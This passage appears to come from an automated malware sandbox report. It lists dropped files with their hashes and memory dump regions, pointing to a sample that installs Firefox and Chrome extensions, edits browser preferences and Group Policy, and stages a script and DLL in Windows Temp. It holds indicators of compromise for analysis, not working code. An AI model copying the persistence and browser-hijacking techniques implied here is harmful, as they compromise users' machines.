                                                                                                                      b6a015e163bbd24097e9b12d583853b96677858e7cee5d0981a8cbf068b4092262bc2d05bcc2f91cf4ea2583b88e2d5c5149c8e405570e68788c75450dae14af

                                                                                                                    • C:\Program Files (x86)\NeZWLpfMAhqU2\komLPDR.xml

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      6f984707121ffb9afe13c3b1c6138e64

                                                                                                                      SHA1

                                                                                                                      0c129c1e72e093016714d4be7b6fc638ea7cf2fb

                                                                                                                      SHA256

                                                                                                                      e882684e1e2679c176492cdff1bca70a4a853b657cfb04ab0acb8afe1da70629

                                                                                                                      SHA512

                                                                                                                      191fe05f16450222f1879b47f383d09e20a2e9673e190bc4b4f9f53560dcda067a695b0fbb081526e8bcd48cad250e2027e42d484b603c9409a3cf0364f7fffd

                                                                                                                    • C:\Program Files (x86)\eOISJpbOU\dqQRFsR.xml

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      e7501d14fe893488ff6128ab4878b2dc

                                                                                                                      SHA1

                                                                                                                      bbe61c440a9d51a96ed02ac45f91109ab4a97791

                                                                                                                      SHA256

                                                                                                                      a46d0a201e7291728757ed60e42997b043d49fd05397f5f883a71c76753fe616

                                                                                                                      SHA512

                                                                                                                      fb0d126ce702d01de41f6a29dfc11ee824e1da560c34da4c1ddae65b97a15674e42f189211974c092bbf9c2d31798d2012999f7c8b7947176b3c009073857242

                                                                                                                    • C:\Program Files (x86)\khqZzjjJsExFC\KjmwisG.xml

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      d4a8df10db8a5c4157ac61a75e8b57b9

                                                                                                                      SHA1

                                                                                                                      4f68458f8b1c3d58d26d4cce9b7b6b9a73eb9739

                                                                                                                      SHA256

                                                                                                                      159b3202dd0913b9b0a05a9e6b239434106fbf5a13a0f8363d657224eb5edccf

                                                                                                                      SHA512

                                                                                                                      f02100196f895463febec303fd14a2d5b997286c094e74b9acb8444f97fdb16067cae73603023ede32dd69142be8999139c4270a89f13bd64f60ba569d64b10a

                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      MD5

                                                                                                                      bb874bd1af9473e65392bf3ac87c4a14

                                                                                                                      SHA1

                                                                                                                      bb53677ccf6818b77e1e9f5d0edec004b2e6b860

                                                                                                                      SHA256

                                                                                                                      3d15a53b4a634d2e4d7f3f8cc4e36a10943d951e83e89d69c996daa44d89b727

                                                                                                                      SHA512

                                                                                                                      cd5dc8508ba1b59deb6434156bf759f67e29d125b38cf4f1801ee6a8bfb35e262792f52e9b8552cdfc93eecbfd5a5f4bde0c3f3b9399007fdb8ab4f8084575f4

                                                                                                                    • C:\ProgramData\vNwAEuYqEraFXGVB\TWWydLB.xml

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      1f1158766a343da70003706036e45d96

                                                                                                                      SHA1

                                                                                                                      da484abb0aadf1194d5a181b2306acc7d7ce07aa

                                                                                                                      SHA256

                                                                                                                      4fdcabcd10b8caf29912cd13ed432e255fd0c2c389ad94d52588dd3a58988e58

                                                                                                                      SHA512

                                                                                                                      a2779955a63642a2aaf60fc4d6f077a390cc3efc6b221ba3332a7a10d9319cf7364a2da101d69ad8a05ca73316cee854654cbac4f4c2af2bc855990e15375c20

                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                      Filesize

                                                                                                                      187B

                                                                                                                      MD5

                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                      SHA1

                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                      SHA256

                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                      SHA512

                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                      Filesize

                                                                                                                      136B

                                                                                                                      MD5

                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                      SHA1

                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                      SHA256

                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                      SHA512

                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                      Filesize

                                                                                                                      150B

                                                                                                                      MD5

                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                      SHA1

                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                      SHA256

                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                      SHA512

                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                      Filesize

                                                                                                                      10KB

                                                                                                                      MD5

                                                                                                                      ac51465dde03d86abd8ca3ddd41dbc78

                                                                                                                      SHA1

                                                                                                                      be92d01297945362c43f3b8f0c7dd0ff62f20179

                                                                                                                      SHA256

                                                                                                                      087a79e70555f2ba2c84c0cc4d741c29ceaa4391afc687cee3dde286f949c253

                                                                                                                      SHA512

                                                                                                                      f1e09e298f342532531e57464b6de8528f84661f4c51f17e0ebe93c824388ab77ecc8a5356356b8e1c924f80b2178b557ee892a4fa1e0808117ea555256799f2

                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      503f8b76fe835dd124f863208cdafe0a

                                                                                                                      SHA1

                                                                                                                      dba186a540b2ba4b6b2b4cde15446f257469ad36

                                                                                                                      SHA256

                                                                                                                      b4b6dcfa60504d4f5a86ed5410280dac0e1a65c899e3f64ac99b81318eb3f162

                                                                                                                      SHA512

                                                                                                                      b87c7593fa9fa6052d710d15891fed0623e8659ad46a98c3fde59ec4e3fa97077754f28f4b5f44aa15557be3fae42539d5f9dadbe78a640a051921975a34df38

                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      6a76e3072824d66fa8c07179e3e1d6f1

                                                                                                                      SHA1

                                                                                                                      92edfde3b6de3f9d51f2830d16588e86e923f65f

                                                                                                                      SHA256

                                                                                                                      49d3f16181519ac39b0c26b02a3a8664179b5cb09d9351d651377c22fb1c626c

                                                                                                                      SHA512

                                                                                                                      1194b8ec81c58ad11fda9d13e225054f07c76fc3bc2b237342282949571a7ca9a7cc3e791782d3f6ef110511cbef7e5433fceccf026d547ad9fc7e502bb4a518

                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G9G746W407OWWAK5QW64.temp

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      1c6e16e42e1063894588cc54bc79b093

                                                                                                                      SHA1

                                                                                                                      87f8b2011eeaa743537243ef4bc49705d91f616b

                                                                                                                      SHA256

                                                                                                                      493da8ff720654a331a2b4ea2cafb0c444e4ff18bafbeba65a180a80ed3f0ae3

                                                                                                                      SHA512

                                                                                                                      2b4fa36afdd8b153e92beaa70a1029aa6a8e70b75a27f922284a425b7d3121430d444c661f51c1a7bebbdca1589008d7dc5ca880b7572c0f9dc7dd56e50081ba

                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sexvjvzg.default-release\prefs.js

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      144904727fbe8ff7f79d04fa204cd7fb

                                                                                                                      SHA1

                                                                                                                      763f8b4cdfde0da3b1e96e0465acfc40ee7b0e9b

                                                                                                                      SHA256

                                                                                                                      9b204bf3e1ae6b66db40d2b3360a1f63a11ada8d644801ed1ce6089bfb6be91d

                                                                                                                      SHA512

                                                                                                                      21d677c9242c6316a8c1fe6f5106a4020300927de044cc706458a9c81360a6476c605d529ed1e044a4fa89b211d0b76e3d7bed9234fdf4634eb31fa9e9a0578c

                                                                                                                    • C:\Windows\Temp\dvCPKpbdOyEnPlbQ\mQaEPoNX\sVtktNuytcYNwMWI.wsf

                                                                                                                      Filesize

                                                                                                                      9KB

                                                                                                                      MD5

                                                                                                                      8695171100a7611646ab0d0916a12d84

                                                                                                                      SHA1

                                                                                                                      f91a3493468bae1b1eb88c9bc86031e8620333a9

                                                                                                                      SHA256

                                                                                                                      cafc4ce1bfa08d8766c973738dd22c88570797ffd8cf78438ef720ef122716fe

                                                                                                                      SHA512

                                                                                                                      5be0202ca4cc664a4cd93b4c07d18fb7f5ae314506d3cc4e55a0911de3b3e26a70fd9cc5e5efe1dbdb618a2eeff5c13536042545bd5a22840280c0c5793f165e

                                                                                                                    • C:\Windows\Temp\dvCPKpbdOyEnPlbQ\numGTjNr\JpRXKZe.dll

                                                                                                                      Filesize

                                                                                                                      6.5MB

                                                                                                                      MD5

                                                                                                                      af5c01542bbcccac55e745f3291abc64

                                                                                                                      SHA1

                                                                                                                      f4b416b4add71485247e86ccf179d840869321b2

                                                                                                                      SHA256

                                                                                                                      9a30cf199b8326c032eab02a76939919fa2198b2b4f42732219e50ab51ee153b

                                                                                                                      SHA512

                                                                                                                      67ece734599e6eeec8ce037e388afc48f1ac9bc58d4fc1b81ac5531aa806238dbd7746aa6110396f64e96ba244cf6f7679105d5faca1a7062c071243bfdb4e08

                                                                                                                    • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                      Filesize

                                                                                                                      6KB

                                                                                                                      MD5

                                                                                                                      a19b8e9b5feda86d872be10472e2ea8d

                                                                                                                      SHA1

                                                                                                                      052c0e64025f9b9274a93b8e7dd4c1da1d92e5bf

                                                                                                                      SHA256

                                                                                                                      c9a9b0a5c41bf19f70a2adfafe4e395c0fd62ff30d520f183550e69061290b43

                                                                                                                      SHA512

                                                                                                                      9f59df2bafc6bad4a684456ea6163d81f8443712290919540377210507917f8301110296c5922e90434398108d5774531cc13cd76c29357070a36f16299d839a

                                                                                                                    • \Users\Admin\AppData\Local\Temp\7zS4911.tmp\Install.exe

                                                                                                                      Filesize

                                                                                                                      6.4MB

                                                                                                                      MD5

                                                                                                                      158259b7c14a825799f24a9a7086620f

                                                                                                                      SHA1

                                                                                                                      0b23dc2ec22908ebb560e741552b15950c3d5f70

                                                                                                                      SHA256

                                                                                                                      af92382a4603a9ae73ced665226e560b271038e985853a8acceb7158f2419eb9

                                                                                                                      SHA512

                                                                                                                      5fafeecbf64f0eed1c441d3681ba0bdaae65de8bbe899b9559b800f9f18a85e12a8d2af4c35db18fb18b46f08ecf4945532ba6eeb28149f6c8483ed7e531cb5c

                                                                                                                    • \Users\Admin\AppData\Local\Temp\7zS4AD6.tmp\Install.exe

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                      MD5

                                                                                                                      bf2d498f8057e3522c8096d6c915c366

                                                                                                                      SHA1

                                                                                                                      60a008942580d9f7cdc9104ed8b6fcd125539e66

                                                                                                                      SHA256

                                                                                                                      4e5cf70ab5f0530803345bc737a8a998d7b0aa221ef354f38f8acccb93122a77

                                                                                                                      SHA512

                                                                                                                      bc5dd38957c5e7958bd40bd238f742e5e9aa9be17038cfab9dc150906470563278f1e8f36361b2acfd84a288c276364cbe34313ed46f9d32aa8e99f8aafb166b

                                                                                                                    • memory/636-60-0x00000000022D0000-0x00000000022D8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/636-59-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.9MB

                                                                                                                    • memory/736-70-0x00000000022D0000-0x00000000022D8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/736-69-0x000000001B710000-0x000000001B9F2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.9MB

                                                                                                                    • memory/1512-83-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.9MB

                                                                                                                    • memory/2272-71-0x0000000000200000-0x00000000008BF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2272-48-0x0000000000200000-0x00000000008BF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2272-92-0x0000000000200000-0x00000000008BF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2272-49-0x0000000010000000-0x00000000105DB000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.9MB

                                                                                                                    • memory/2288-358-0x0000000001430000-0x0000000001A0B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.9MB

                                                                                                                    • memory/2476-140-0x0000000002870000-0x00000000028D5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      404KB

                                                                                                                    • memory/2476-91-0x0000000000B70000-0x000000000122F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2476-370-0x0000000000B70000-0x000000000122F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2476-335-0x0000000003BB0000-0x0000000003C91000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      900KB

                                                                                                                    • memory/2476-106-0x00000000023A0000-0x0000000002425000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      532KB

                                                                                                                    • memory/2476-94-0x0000000010000000-0x00000000105DB000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.9MB

                                                                                                                    • memory/2476-325-0x0000000002C10000-0x0000000002C97000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      540KB

                                                                                                                    • memory/2500-314-0x0000000077930000-0x0000000077A2A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1000KB

                                                                                                                    • memory/2500-313-0x0000000077A30000-0x0000000077B4F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.1MB

                                                                                                                    • memory/2796-41-0x0000000002410000-0x0000000002ACF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2796-22-0x0000000002410000-0x0000000002ACF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2996-25-0x00000000017D0000-0x0000000001E8F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2996-24-0x00000000017D0000-0x0000000001E8F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2996-23-0x0000000001110000-0x00000000017CF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2996-43-0x00000000017D0000-0x0000000001E8F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2996-29-0x0000000010000000-0x00000000105DB000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.9MB

                                                                                                                    • memory/2996-26-0x00000000017D0000-0x0000000001E8F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2996-44-0x00000000017D0000-0x0000000001E8F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2996-45-0x00000000017D0000-0x0000000001E8F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB

                                                                                                                    • memory/2996-42-0x0000000001110000-0x00000000017CF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.7MB